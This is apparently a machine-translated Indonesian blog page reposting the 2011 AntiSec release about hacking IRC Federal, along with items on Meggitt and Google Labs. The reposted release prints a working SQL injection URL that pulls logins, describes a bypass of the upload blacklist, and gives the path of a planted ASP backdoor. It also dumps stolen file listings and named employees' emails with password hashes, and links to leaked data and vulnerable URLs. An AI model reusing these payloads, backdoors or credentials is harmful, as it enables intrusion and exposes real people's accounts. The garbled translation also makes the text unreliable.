Anonymous Hacks FBI Contractors IRC Federal
Hacker anonim saat ini kebocoran beberapa file dari IRC federal melalui tweet. Mereka sudah mendapatkan akses ke kontrak, dokumen internal, skema pengembangan, login dan banyak lagi. Download Link dirilis oleh Anonymous http://www.mediafire.com/?twxc1nhiluwr126 # 1, 106,91 MB. juga tersedia sekarang Torrent.
Anonymous Said "Jika Anda menempatkan nilai apapun pada kebebasan, kemudian berhenti bekerja untuk kaum oligarki dan mulai bekerja melawan itu. Hentikan membantu perusahaan-perusahaan dan pemerintahan yang menggunakan cara tidak etis untuk sudut sejumlah besar kekayaan dan lanjutkan untuk terang-terangan menyalahgunakan kekuasaan mereka. Bersama, kita memiliki kekuatan untuk mengubah dunia ini menjadi lebih baik.".
Release lengkap pada Pastebin seperti yang ditunjukkan di bawah ini:
``` : h0 yyyh `
:0yyhhh 0 0 : hhy00: `
: 0hhh :: : y 0y 0000 :`
`: 000hh : ` : 0hh : 00yy :`
hh0: ` : :h00hh0:
`` y : : : hh0 `
h0 : : ` ` : : 0 : : hyy:`
` h0 : ` 0: ` : hh
` 0h0: : : : 0h0 0hh000 0 : 0 :::0 :: :: y `
`hh: : : : : : :: : 0 : :: h 0h: yh
y : :: :: : 0 h0
h : : 00 : ::: :::: : : 0 y0
yh : 0 : :: ::0h 0 00y : : : hy
y 00 ::: :: : : : y : : hy : ::: yyh `
hyhyy : : : :: hh : :0yh ::: :::: hyh:`
: 0 :::: : :: :: :y0:: : :h0: : :::: hyy0 0h00hhyh
000 000yy :: ::: y : hyh0hhh0hh0 : 0hyh :`
` 0hhhhhyh00hhh: : h :`
```` : 00
0 : : h:
0:: h
` 0 : h `
` : : h: :0 `
yh : : : ::0 0: : : 0 `
` h 00 :: :::: :: : : 0hyh
`: yhh0hyh0 0 hhh0 `
0 :h
`h:: 0
`0::::h
` 0: ::y:`
hhy0: ::yyhy0
` ` 0 0yh :hh0 y: ` ``
::0 000 : : 0hy hyhhyyh `
`: 0 0 0: : : : h0: ::: 0hh
:: ` : 0h: :::: :: 00 : 00 0 : ::: 0hh : :`
` h 0 :::: : : :: : :::: :: : 00hh 0 hh
################################################################################
### #ANTISEC LAYING NUCLEAR WASTE TO MILITARY AND WHITE HAT BOXES SINCE 2011 ###
# FOR OFFICIAL UNDERGROUND USE ONLY # FUCK LOIC & LOIC-KIDS # FUCK BARRETBROWN #
################################################################################
_ _ __ __
__| || |__ _____ _____/ |_|__| ______ ____ ____
\ __ / \__ \ / \ __\ |/ ___// __ \_/ ___\ #anonymous
| || | / __ \| | \ | | |\___ \\ ___/\ \___ #whiteh8
/_ ~~ _\ (____ /___| /__| |__/____ \\___ \ \___ | #antisec
|_||_| \/ \/ \/ \/ \/
################################################################################
roses are red, violets are blue,
we hate whitehats, and you do too!
################################################################################
Hari ini kita melepaskan ownage pemerintah lagi-kontrak perusahaan IT, IRC
Federal. Mereka membual tentang multi-juta dolar kemitraan mereka dengan FBI,
Angkatan Darat, Angkatan Laut, NASA, dan Departemen Kehakiman, menjual mereka "keterampilan" untuk
AS kekaisaran. Jadi kita meletakkan limbah nuklir ke sistem mereka, memiliki menyedihkan mereka
kotak jendela, menjatuhkan database mereka dan email pribadi, dan dirusak mereka
profesional mencari situs web.
Dalam email mereka kami menemukan berbagai kontrak, skema pengembangan, dan internal
dokumen untuk berbagai instansi pemerintah termasuk usulan untuk FBI
untuk mengembangkan "Khusus Identitas Modernisasi (SIM) Proyek" untuk "mengurangi
teroris dan kegiatan kriminal dengan melindungi semua catatan yang berhubungan dengan
terpercaya individu dan mengungkapkan identitas dari orang-orang yang mungkin
menimbulkan risiko serius bagi Amerika Serikat dan sekutunya ". Kami juga menemukan
fingerprinting kontrak untuk pengembangan, DOJ biometrik untuk militer,
dan strategi kontrak untuk Administrasi Keamanan "Nuklir Nasional
Senjata Nuklir Kompleks ".
Selain itu kami menemukan informasi login ke VPN dan Departemen berbagai beberapa
Energi panel akses login bahwa kita sedang membuang * hidup * lengkap dengan beberapa URL
hidup file browser ASP dan meng-upload backdoors - mari kita lihat berapa lama waktu yang dibutuhkan untuk
mereka untuk menghapusnya (jangan khawatir kita akan terus meletakkan kembali sampai mereka menarik
kotak; D)
Sebelum kita mulai drop, pesan pribadi kepada karyawan dari IRC Federal
Jika Anda menempatkan nilai apapun pada kebebasan, kemudian berhenti bekerja untuk oligarki
dan mulai bekerja melawan itu. Hentikan membantu perusahaan-perusahaan dan pemerintah
yang menggunakan cara tidak etis untuk sudut sejumlah besar kekayaan dan melanjutkan
untuk terang-terangan menyalahgunakan kekuasaan mereka. Bersama, kita memiliki kekuatan untuk mengubah
dunia ini lebih baik.
Props to our black hat and antisec comrades: bantown, dikline,
h0no, phrack high council, ~el8 and all you kick-ass motherfuckers
we've never even heard of. Thank you.
################################################################################
## own & rm # own & rm # own & rm # own & rm # own & rm # own & rm # own & rm ##
################################################################################
Ello ej33t hax0urz! Kami memutuskan untuk melempar dalam sedikit bonus bagi anda yang
tinggal sebagai orang asing melalui dokumen ini membosankan-ass untuk memberikan sedikit rasa (dan
mudah-mudahan beberapa ide) tentang bagaimana hal ini turun!.
Sebelum Anda Adrian Lamo-jenis el33t (lololol!) Hacker mendapatkan tongkat Anda
keledai, hanya menyimpan doc sebelumnya dalam pikiran dan ingat: bahkan jika semua yang dapat Anda lakukan
adalah sql injeksi, Anda masih ~ 300% lebih berbakat dari nenek paling!
h0h00h0h0! (srsly tho)
http://www.ircfederal.com/news_display.asp?ID=-1%20union%20select%201,username,
mynumber,1%20FROM%20logins%20WHERE%20username%20%3C%3E%20%27bhunt%27
# admin login!
Setelah kami memiliki login admin, ada script untuk upload gambar. mereka
ekstensi blacklist (catatan untuk diri sendiri: daftar putih akan lebih tepat
di sini!), yang dilarang antara lain ASP. Apa yang mereka tidak memeriksa itu. Cfm
Ada beberapa orang lain juga. Ada database phpbb internal yang kita
download dan retak dan mendapat beberapa password email.
Jadi sekarang Anda tahu! Melindungi Anda dan keepz sialan itu realz!
################################################################################
## own & rm # own & rm # own & rm # own & rm # own & rm # own & rm # own & rm ##
################################################################################
file browse:
file upload: http://ircfederal.com/data/x.asp
Directory of C:\
07/04/2011 11:20 PM <DIR> .
07/04/2011 11:20 PM <DIR> ..
07/04/2011 08:00 PM <DIR> Backup
07/04/2011 08:00 PM <DIR> CAConfig
07/04/2011 08:00 PM <DIR> CFUSION
07/04/2011 08:00 PM <DIR> Documents and Settings
07/04/2011 08:00 PM <DIR> IIS-Aid
07/04/2011 08:00 PM <DIR> Inetpub
07/04/2011 08:00 PM <DIR> IOGA_2010
07/04/2011 08:00 PM <DIR> old sites moved to air
07/04/2011 08:00 PM <DIR> PHP
07/04/2011 08:00 PM <DIR> Program Files
07/04/2011 08:00 PM <DIR> Projects
07/04/2011 08:00 PM <DIR> RECYCLER
07/04/2011 08:00 PM <DIR> System Volume Information
07/04/2011 08:00 PM <DIR> usr
07/04/2011 08:00 PM <DIR> vbroker
07/04/2011 08:00 PM <DIR> VxPushRA
07/04/2011 08:00 PM <DIR> webdatabases
07/04/2011 08:00 PM <DIR> WebSites
07/04/2011 08:00 PM <DIR> WINNT
07/04/2011 08:00 PM <DIR> WUTemp
Directory of downloads/
07/02/2011 02:41 AM <DIR> .
07/02/2011 02:41 AM <DIR> ..
07/02/2011 02:56 AM <DIR> webdatabases
07/02/2011 03:12 AM 614,400 inventory.mdb
07/02/2011 03:21 AM 10,358,784 irc_site.mdb
07/02/2011 04:24 AM 1,396,224 IRC-VPN.doc
07/02/2011 03:25 AM 675,840 jubileewv.mdb
07/02/2011 03:26 AM 675,840 landmark.mdb
07/02/2011 03:26 AM 671,744 lccc.mdb
07/02/2011 03:31 AM 8,257,536 LWV.mdb
07/02/2011 03:43 AM 3,813,376 MantechLPM.mdb
07/02/2011 03:48 AM 11,272,192 MorgantownWeb.mdb
07/02/2011 03:50 AM 5,109,448 mpc_data.mdb
07/02/2011 03:51 AM 1,662,976 new_irc.mdb
07/02/2011 03:28 AM 7,020,544 newclass.mdb
07/02/2011 03:55 AM 638,976 SJMH.mdb
07/02/2011 03:45 AM 974,848 student.mdb
07/02/2011 03:44 AM 466,944 student2.mdb
07/02/2011 03:56 AM 106,496 survey.mdb
07/02/2011 03:57 AM 774,144 teachers.mdb
07/02/2011 04:00 AM 856,064 truly.mdb
07/02/2011 04:02 AM 151,552 Vaees.mdb
07/02/2011 04:02 AM 1,138,688 victory_cat.mdb
07/02/2011 04:03 AM 122,880 WeeklyActivityReport.mdb
07/02/2011 04:03 AM 64 weston.ldb
07/02/2011 04:04 AM 3,960,832 weston.mdb
07/02/2011 04:04 AM 3,960,832 weston1.mdb
07/02/2011 04:05 AM 3,960,832 weston2.mdb
07/02/2011 04:06 AM 1,883,668 wmdgear.mdb
07/02/2011 04:09 AM 1,134,592 wvantiquemarket.mdb
07/02/2011 04:18 AM 765,952 WVEDC_Members.mdb
07/02/2011 04:19 AM 966,656 wvstore.mdb
07/02/2011 04:18 AM 319,488 electric.mdb
07/04/2011 06:11 PM 1,073,152 enterprise_modeling.mdb
07/02/2011 04:03 AM 405,504 feedback.mdb
07/02/2011 04:02 AM 327,680 house.mdb
07/02/2011 03:23 AM 790,528 industrial.mdb
34 File(s) 76,309,276 bytes
Directory of downloads/webdatabases
07/02/2011 02:56 AM <DIR> .
07/02/2011 02:56 AM <DIR> ..
07/02/2011 02:54 AM 14,290,944 allee_catalog.mdb
07/02/2011 02:55 AM 155,648 bea-log.mdb
07/02/2011 02:55 AM 811,008 catherine_miller.mdb
07/02/2011 02:55 AM 167,936 cityofweston.mdb
07/02/2011 02:08 AM 9,437,184 ircfederal.mdb
07/02/2011 02:53 AM 2,084,864 adoptafriend.mdb
07/02/2011 02:56 AM 300 WS_FTP.LOG
07/02/2011 02:57 AM 2,166,784 fghi.mdb
07/02/2011 02:58 AM <DIR> intranet
07/02/2011 03:12 AM 614,400 inventory.mdb
9 File(s) 29,729,068 bytes
Directory of downloads/webdatabases/intranet
07/02/2011 02:58 AM <DIR> .
07/02/2011 02:58 AM <DIR> ..
07/02/2011 03:04 AM 1,044,480 Intranet_Forum.mdb
07/02/2011 02:58 AM 69 intra.7z
07/02/2011 03:04 AM 0 intra.mdb
07/02/2011 03:04 AM 1,155,892 Intra.zip
07/02/2011 03:06 AM 11,272,192 intra_4-17.mdb
07/02/2011 03:11 AM 18,403,328 test_intra.mdb
07/04/2011 08:00 PM 64 Intranet_Forum.ldb
7 File(s) 31,876,025 bytes
################################################################################
==== Intranet_Forum.mdb ====
################################################################################
Terima kasih untuk menginstal bagian yang paling tidak aman dari forum kotoran di Bumi
di intranet anda - phpbb <3
sjohnson:2dfe5eec4b54cec609cf709b824630e5:sjohnson@ircwv.com
bhunt:17c47e3d330a684adb207c25190fdd01:bhunt@ircwv.com
kbelt:7fc35b06d610ee50bcb2e4c0751e8bdd:kbelt@ircwv.com
lmick:1abae2c527b80ebae05cd93670639707:lmick@ircwv.com
strefz:c5333176e2e62d40b29b520e30b753e1:strefz@ircwv.com
tuldrich:6845f32f1a73b387ab81924211db9835:tuldrich@ircwv.com
jmoore:3c5403d0df84733d1dc0323ca6e36325:jmoore@ircwv.com
bwentz:792be28a852fab3f6fb673dccf8dde98:bwentz@ircwv.com
ebrown:5e1adbeb0be073ebe835683880efb9cf:ebrown@ircwv.com
bwilliams:06a5fcae55d72a3cc92a27bc4cd5475e:bwilliams@ircwv.com
bgolden:35c08970ea65272a32d3a2eee3d382ed:bgolden@ircwv.com
srobertson:3b8acbb030bb9051da253731bae6ae12:srobertson@ircwv.com
sguinn:d6919e90f8e55fc227248be2d7d74182:sguinn@ircwv.com
jturner:58d3e64b4842c724bdb768be4ab8a90c:jturner@ircwv.com
smealey:3fbc778e075349ffac5e37b81031878a:smealey@ircwv.com
alane:a0b0ddd608e3e812470a57952195a43d:alane@ircwv.com
jsmith:1831ee85c424301c1d971e1f528db528:jsmith@critical1.com
swhite:dfbaf054abb3457b2447c1aca9acb4dd:Steven.White@ircwv.com
gstine:105ae5fb0f09f6af2c2c9cb735dc24e5:gstine@ircwv.com
Dari 6 yang crack dalam waktu yang wajar, dua sebenarnya
dua kali lipat sebagai email mereka. Benar-benar orang-orang?
Directory of ircf/bhunt
07/04/2011 05:34 PM <DIR> .
07/04/2011 05:34 PM <DIR> ..
07/04/2011 05:25 PM 258,048 144978-SOL-001-003_Draft-Bob-07-01-11.xls
07/04/2011 05:27 PM 39,805 Contractor Job Listings-WV_updated as of
063011.xlsx
07/04/2011 05:27 PM 15,348 Jun 2011 work Schedule.xlsx
07/04/2011 05:24 PM 17,353 M 3_MS_COMPLIANCE_MATRIX rev bgd.docx
07/04/2011 05:30 PM 286,124 msg0033.wav
07/04/2011 05:28 PM 363,884 msg0041.wav
07/04/2011 05:28 PM 381,164 msg0042.wav
07/04/2011 05:21 PM 2,040,373 Scanned from the Weston Xerox001(1).pdf
07/04/2011 05:21 PM 416,658 Scanned from the Weston Xerox001(2).pdf
07/04/2011 05:22 PM 2,081,373 Scanned from the Weston Xerox001(3).pdf
07/04/2011 05:22 PM 156,031 Scanned from the Weston Xerox001(4).pdf
07/04/2011 05:23 PM 147,533 Scanned from the Weston Xerox001(5).pdf
07/04/2011 05:20 PM 2,089,268 Scanned from the Weston Xerox001.pdf
07/04/2011 05:25 PM 176,640 SWAT_Cost_Volume_Draft_Bob-07-01-11.doc
07/04/2011 05:25 PM 1,219,706
SWAT_Volume_II_Mission_Suitability_Volume_Final_BH - bgd rev.docx
15 File(s) 9,689,308 bytes
Sabtu, 09 Juli 2011
Jumat, 01 Juli 2011
Database Meggit Hacked - Militer AS dan Penegakan Hukum pemasok peralatan untuk # Antisec
Database www.meggitttrainingsystems.com sebuah Militer AS dan Penegakan Hukum pemasok peralatan telah di hacked dan terpapar oleh Anonymous (Kru Bash).
Hacker mengatakan "Orang-orang dari Amerika Serikat ,pemerintah Anda menempatkan ada kepercayaan dan uang Anda ke orang-orang ini dan kami masuk ke database menggunakan dork google dan cara injection.semua dan kita berharap ini akan menyebabkan banyak spamming dari korps dan pemerintah akan memilih seperti situs kurang aman. "
vUNL link : http://www.meggitttrainingsystems.com/main.php?id=119
Hacker Rilis database Pastebin: http://pastebin.com/0r4A9DVR
If you enjoyed The Hacker News, Make sure you subscribe to our RSS feed. Stay Updated about latest Security threats, Hacking threads & IT Issues from all over the world.!
SQL Injection Kerentanan dalam Database System Lab Google
Kerentanan Sangat Besar & Kritis terdeteksi di Lab Sistem Google. Vendor sudah dilaporkan oleh hacker, Tapi mereka tidak mengambil langkah positif dalam hal ini, sehingga akhirnya terkena hacker kerentanan di depan umum oleh Bangladesh Cyber Army Admin - Shadman Tanjim di Forum mereka.
Google Website Lab telah Kerentanan SQL Injection dan hal Berbahaya adalah Kerentanan ini dieksploitasi. Hacker bisa mendapatkan Tabel, kolom dan data dari Database. Google Lab Database memiliki sendiri menyesuaikan sistem DB. Tapi hal-hal menarik adalah sistem database mereka Similar sebagai database Ms Access. Dalam hal ini Ms Access adalah SQL Injection Sistem Juga Bekerja pada sistem database Google Lab.
Pernyataan Hacker:
I already contact with Google Corporation but they don’t give positive response, I think this is their big fault, and will suffer for that. But if they give Positive response then this will be very good for them. Thanks a Ton!!!
Shadman Tanjim
Ethical Hacker, Programmer and Security Professional
Email: admin@bdcyberarmy.com or shadman2600@gmail.com
Website: www.bdcyberarmy.com/forum
Greets to: Shahee Mirza, Almas Zaman, Sayem Islam, Pudina pata, LuckyFm and All
Bangladesh Cyber Army Members.
Saya sudah kontak dengan Google Korporasi tetapi mereka tidak memberikan respon positif, saya pikir ini adalah kesalahan besar mereka, dan akan menderita untuk itu. Tetapi jika mereka memberikan respon positif maka ini akan sangat baik bagi mereka. Thanks a Ton!Shadman Tanjim
Etika Hacker, Programmer dan Keamanan Profesional
Email: admin@bdcyberarmy.com atau shadman2600@gmail.com
Website: www.bdcyberarmy.com / forum
Salam untuk: Shahee Mirza, Almas Zaman, Sayem Islam, Pudina pata, LuckyFm dan Semua
Bangladesh Cyber Anggota. Angkatan Darat
Video Download link:
http://www.bdcyberarmy.com/Google/google_video.avi
Hacker Rilis Langkah demi langkah tentang Kerentanan bukti ini
1. Website : www.googlelabs.com or labs.google.com
2. Vulnerability type : SQL Injection
3. Vulnerable url : http://www.googlelabs.com/?q=%27&apps=Search+Labs
4. Info:
Host IP: 209.85.175.141
Web Server: Google Frontend
Keyword Found: Fast
Injection type is Integer
Mari Periksa Pemanfaatan Rentan link ini. Berikut Hacker menggunakan 3 alat Terkenal SQL Injection. Mereka adalah:
1. Havij Advance SQL Injection Tool
2. Safe3 SQL Injector v8.4
3. Pangolin SQL Injection Tool
1 . Bekerja dengan Havij Alat SQL Injection Advance:
Screen Shot 1: Link memindai Rentan dan mengatakan situs ini adalah Rentan.
Screen Shot 2: Sekarang scan dan mendapatkan semua tabel dan kolom
Screen Shot 3: Sekarang Anda dapat melihat daftar tabel dan Kolom
Dan ini adalah Buktikan untuk Situs ini adalah SQL Injection Rentan Asli. Disini anda melihat jenis database MS Access, jadi ini adalah Bukti dari konsep ini. Beberapa orang harus Katakanlah Google Lab Sistem Database tidak Ms Access tapi ini database Website Similar sebagai database Ms Access dan Ms Access Query SQL Injection juga Bekerja pada sistem database Google Labs. Sebagai seperti MySQL 5 dan MySQL 4.1 keduanya disuntikkan melalui Uni pilih, tetapi keduanya tidak memiliki Skema Informasi.
2 .sekarang Bekerja dengan SQL Injector Safe3 v8.4:
Screen Shot 1: Menganalisis hubungan Rentan dan mengatakan itu rentan dan mendapatkan kata kunci dan jenis db.
Screen Shot 2: Sekarang Suntikkan link rentan dan mendapat Semua daftar Tabel dan daftar kolom
Ini adalah satu lagi Buktikan untuk Kerentanan Website dan kita bisa melihat ini dan hal yang Berbahaya dieksploitasi nya. Sekarang kita cek terakhir kami SQL Injection alat untuk 100% Memuaskan.
3rd Pangolin SQL Injection Tool:
Screen Shot 1: Link memindai rentan dan yang mengatakan website ini rentan
Screen Shot 2: Sekarang menyuntikkan Website ini dan mendapatkan tabel dan kolom daftar
Screen Shot 3: Berikut ini adalah Daftar lengkap dari Tabel dan daftar Kolom
Sekarang saya pikir kita adalah 100% Tentu Google Lab SQL Injection Website Rentan.
UPDATE :
Google bersikeras bahwa ada telah ada intrusi. Perusahaan ini mengklaim bahwa database GQL mereka tidak akan membiarkan serangan injeksi SQL. Selain itu, mereka mengatakan bahwa data yang muncul di screen shot, tidak ada di mana saja di toko-toko data mereka.
Langganan:
Postingan (Atom)